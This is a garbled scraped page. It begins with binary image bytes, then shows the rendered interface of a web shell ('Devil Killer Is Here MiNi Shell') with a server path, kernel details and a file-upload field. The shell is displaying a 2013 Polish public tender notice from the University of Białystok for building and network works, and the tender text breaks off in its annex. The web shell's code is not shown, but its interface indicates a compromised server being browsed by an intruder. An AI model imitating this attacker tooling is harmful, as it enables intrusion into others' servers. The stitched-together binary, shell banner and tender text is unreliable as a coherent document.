JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/168828-N-2013.html

<p class="kh_header"><b>Białystok: Wykonanie robót remontowych i inwestycyjnych w obiektach Uniwersytetu 
w Białymstoku</b><br>
<b>Numer ogłoszenia: 168828 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet w Białymstoku , ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, woj. podlaskie, tel. 085 7457117, faks 085 745 70 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych i inwestycyjnych w obiektach Uniwersytetu 
w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część I: Zadanie nr 1: Wykonanie robót w auli Wydziału Pedagogiki i Psychologii przy ul. Świerkowej 20C w Białymstoku. 
Część II: Zadanie nr 2:  Remont w budynku Domu Studenta nr 1 przy ul. Żeromskiego 1 w Białymstoku. 
Część III: Zadanie nr 3: Remont w budynku przy ul. Pogodnej 65 w Białymstoku.
Część IV: Zadanie nr 4:  Remont mieszkania nr 14 w Budynku Mieszkalnym przy ul. Świerkowej 20C w Białymstoku.
Część V: Zadanie nr 5: Rozbudowa sieci informatycznej Wydziału Pedagogiki i Psychologii o sieć bezprzewodową i włączenie jej do ogólnouczelnianego systemu EduRoam.
Część VI: Zadanie nr 6:  Przeniesienie urządzeń kontroli dostępu zlokalizowanych w szachcie w piwnicy budynku Biblioteki Uniwersyteckiej przy ul. M. Skłodowskiej-Curie 14A w Białymstoku.
Część VII: Zadanie nr 7: Dobór i zainstalowanie urządzeń kompensacji energii biernej oraz wykonanie SZR- samoczynnego załączania rezerwy w budynku Wydziału Historyczno- Socjologicznego oraz Wydziału Filologicznego Uniwersytetu w Białymstoku przy Placu Uniwersyteckim 1 w Białymstoku.
Część VIII: Zadanie nr 10:  Budowa przyłącza kanalizacji deszczowej dla budynku Wydziału Ekonomii i Zarządzania przy ul. Warszawskiej 63 w Białymstoku.
Część IX: Zadanie nr 11: Budowa przyłącza kanalizacji deszczowej dla budynku mieszkalnego przy ul. Zamenhofa 15..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.20.00-3, 45.23.21.30-2, 45.40.00.00-1, 45.45.30.00-7, 45.44.21.00-8, 45.31.00.00-3, 45.31.43.10-7, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał w niniejszym postępowaniu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadki składania oferty na część nr 5 (zadanie nr 5)  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum 2 roboty budowlane polegające na wykonaniu instalacji sieci strukturalnych, każda o wartości nie mniejszej niż 30 000,00 zł oraz poprzez podanie rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dowodów określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami z następującymi uprawnieniami:
- dla części nr 1, 2, 3, 4 (zadania nr 1, 2, 3, 4): kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej;
- dla części nr 1, 4, 7 (zadania nr 1, 4, 7) osobą posiadającą świadectwo kwalifikacyjne E uprawniające do zajmowania się eksploatacją instalacji elektrycznej oraz wykonywania pomiarów elektrycznych;
- dla części nr 8, 9 (zadania nr 10, 11): kierownikiem budowy posiadającym uprawnienia budowlane w specjalności instalacji i sieci sanitarnych;
- dla części nr 8, 9 (zadania nr 10, 11): osobą posiadającą uprawnienia do projektowania w specjalności sieci sanitarnych;
UWAGA: Zamawiający dopuszcza możliwość łączenia kilku funkcji przez jedną osobę w przypadku posiadania kilku rodzajów uprawnień lub kwalifikacji.
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w pkt 6 SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wskazane warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy sporządzony metodą uproszczoną z wykazem elementów scalonych zgodnie z pkt 12 Opis sposobu obliczenia ceny ppkt 9 SIWZ. Kosztorys ma charakter pomocniczy, informacyjny i nie będzie podlegał sprawdzeniu przy badaniu i ocenie ofert. - dotyczy zadań nr 1-6.
Pkt 12) ppkt 9) Kosztorys ofertowy należy sporządzić na podstawie dokumentacji projektowej, szczegółowego opisu przedmiotu zamówienia, specyfikacji technicznej wykonania i odbioru robót, w formie uproszczonej. W kosztorysie ofertowym na pierwszej stronie należy podać dane wyjściowe do kosztorysowania (R, Z, Kz, Kp) oraz załączyć wykaz materiałów i sprzętu. Ceny jednostkowe netto powinny zawierać wszystkie narzuty. Załączone do SIWZ przedmiary robót mają charakter pomocniczy i informacyjny. W przypadku zauważenia przez Wykonawcę rozbieżności w zakresie robót lub materiałów w poszczególnych projektach wykonawczych, specyfikacji, szczegółowym opisie przedmiotu zamówienia, Wykonawca przed określeniem ceny winien zwrócić się z zapytaniem do Zamawiającego w celu jednoznacznego określenia zakresu robót lub użytych materiałów, aby przyjąć prawidłowy koszt zamówienia. - dotyczy zadań nr 1-6.
POSTANOWIENIA DOTYCZĄCE PODMIOTÓW ZAGRANICZNYCH:Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu lub dokumentów potwierdzających odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentowania Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. POSTANOWIENIA DOTYCZĄCE WNOSZENIA OFERTY WSPÓLNEJ PRZEZ DWÓCH LUB WIĘCEJ WYKONAWCÓW: 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna). 2) W przypadku złożenia oferty przez podmioty występujące wspólnie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być sporządzone tak jak zapisano w SIWZ w pkt 10 ppkt 17 OPIS SPOSOBU PRZYGOTOWANIA OFERT. 3) Dokumenty ppkt 1) powinny być złożone przez każdy podmiot (każdy z Wykonawców wchodzących w skład konsorcjum lub spółki cywilnej), jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. 4) Wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą wskazanym i upoważnionym w pełnomocnictwie przez pozostałych Wykonawców. Pkt 10 ppkt 17 SIWZ OPIS SPOSOBU PRZYGOTOWANIA OFERT: Oferta wraz z załącznikami musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku przedsiębiorcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze lub ewidencji. Jeżeli ofertę podpisuje osoba inna niż to wynika z dokumentów rejestrowych (KRS, ewidencja działalności gospodarczej), wówczas do oferty należy dołączyć dokument lub pełnomocnictwo (oryginał pełnomocnictwa lub kopię potwierdzoną za zgodność z oryginałem przez notariusza), z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty: a) pełnomocnictwo powinno jednoznacznie określać zakres umocowania i wskazywać osobę pełnomocnika; b) w przypadku podmiotów występujących wspólnie w dokumencie pełnomocnictwa należy wskazać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia, a każdy z nich powinien podpisać się pod tym dokumentem, c) spółka cywilna dołącza w.w pełnomocnictwo lub dokument, z którego wynika w.w pełnomocnictwo, np. kopie umowy spółki cywilnej lub uchwałę - poświadczone za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy zadań nr 1-5: Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie w sytuacji:
a) zmiany terminu określonego w § 2 ust. 1 lit. b spowodowanego wstrzymaniem realizacji robót ze względu na okoliczności niemożliwe do przewidzenia w momencie zawierania umowy (np.: roboty dodatkowe uniemożliwiające zakończenie zamówienia w terminie).
b) opóźnienie ZAMAWIAJĄCEGO w stosunku do terminu określonego w § 2 ust. 1 lit. a) może spowodować - na wniosek WYKONAWCY - odpowiednie przesunięcie terminu wskazanego w ust. 1 lit. b). 
2. Wszystkie zmiany umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności, z zastrzeżeniem § 8 ust 3.
Dotyczy zadania nr 7: 1. Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie w sytuacji: 
1)  zmiany terminu określonego w § 2 ust. 1 pkt.  2) spowodowanego wstrzymaniem realizacji robót ze względu na okoliczności niemożliwe do przewidzenia w momencie zawierania umowy (np.: roboty dodatkowe uniemożliwiające zakończenie zamówienia w terminie).
2)  opóźnienie ZAMAWIAJĄCEGO w stosunku do terminu określonego w § 2 ust. 1 pkt 1) może spowodować - na wniosek WYKONAWCY - odpowiednie przesunięcie terminu wskazanego w ust. 1 pkt. 2). 
2. Wszystkie zmiany umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.
Dotyczy zadania nr 10 i 11:  1. Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie w sytuacji: zmiany terminu określonego w § 2 ust. 2)  spowodowanego wstrzymaniem realizacji robót ze względu na okoliczności niemożliwe do przewidzenia w momencie zawierania umowy (np.: roboty dodatkowe uniemożliwiające zakończenie zamówienia w terminie).
2. Wszystkie zmiany umowy (z wyłączeniem okoliczności § 8 ust.3) wymagają formy pisemnej w postaci aneksu pod  rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.uwb.edu.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet w Białymstoku, Dział Zamówień Publicznych ul. M. Skłodowskiej - Curie 14, 15-097 Białystok, piętro V, p. 503.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 09:30, miejsce: Uniwersytet w Białymstoku, Kancelaria Ogólna, ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, piętro X, p. 1008..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót w auli Wydziału Pedagogiki i Psychologii przy ul. Świerkowej 20C w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część I: Zadanie nr 1: 
Wykonanie robót w auli Wydziału Pedagogiki i Psychologii przy ul. Świerkowej 20C w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.20.00-3, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont w budynku Domu Studenta nr 1 przy ul. Żeromskiego 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część II: Zadanie nr 2:  
Remont w budynku Domu Studenta nr 1 przy ul. Żeromskiego 1 w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont w budynku przy ul. Pogodnej 65 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część III: Zadanie nr 3: 
Remont w budynku przy ul. Pogodnej 65 w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont mieszkania nr 14 w Budynku Mieszkalnym przy ul. Świerkowej 20C w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część IV: Zadanie nr 4:  
Remont mieszkania nr 14 w Budynku Mieszkalnym przy ul. Świerkowej 20C w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3, 45.33.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 43.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rozbudowa sieci informatycznej Wydziału Pedagogiki i Psychologii o sieć bezprzewodową i włączenie jej do ogólnouczelnianego systemu EduRoam..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część V: Zadanie nr 5: 
Rozbudowa sieci informatycznej Wydziału Pedagogiki i Psychologii o sieć bezprzewodową i włączenie jej do ogólnouczelnianego systemu EduRoam..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.10-7, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeniesienie urządzeń kontroli dostępu zlokalizowanych w szachcie w piwnicy budynku Biblioteki Uniwersyteckiej przy ul. M. Skłodowskiej-Curie 14A w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część VI: Zadanie nr 6:  
Przeniesienie urządzeń kontroli dostępu zlokalizowanych w szachcie w piwnicy budynku Biblioteki Uniwersyteckiej przy ul. M. Skłodowskiej-Curie 14A w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dobór i zainstalowanie urządzeń kompensacji energii biernej oraz wykonanie SZR- samoczynnego załączania rezerwy w budynku Wydziału Historyczno- Socjologicznego oraz Wydziału Filologicznego Uniwersytetu w Białymstoku przy Placu Uniwersyteckim 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część VII: Zadanie nr 7: 
Dobór i zainstalowanie urządzeń kompensacji energii biernej oraz wykonanie SZR- samoczynnego załączania rezerwy w budynku Wydziału Historyczno- Socjologicznego oraz Wydziału Filologicznego Uniwersytetu w Białymstoku przy Placu Uniwersyteckim 1 w Białymstoku..</p></li>
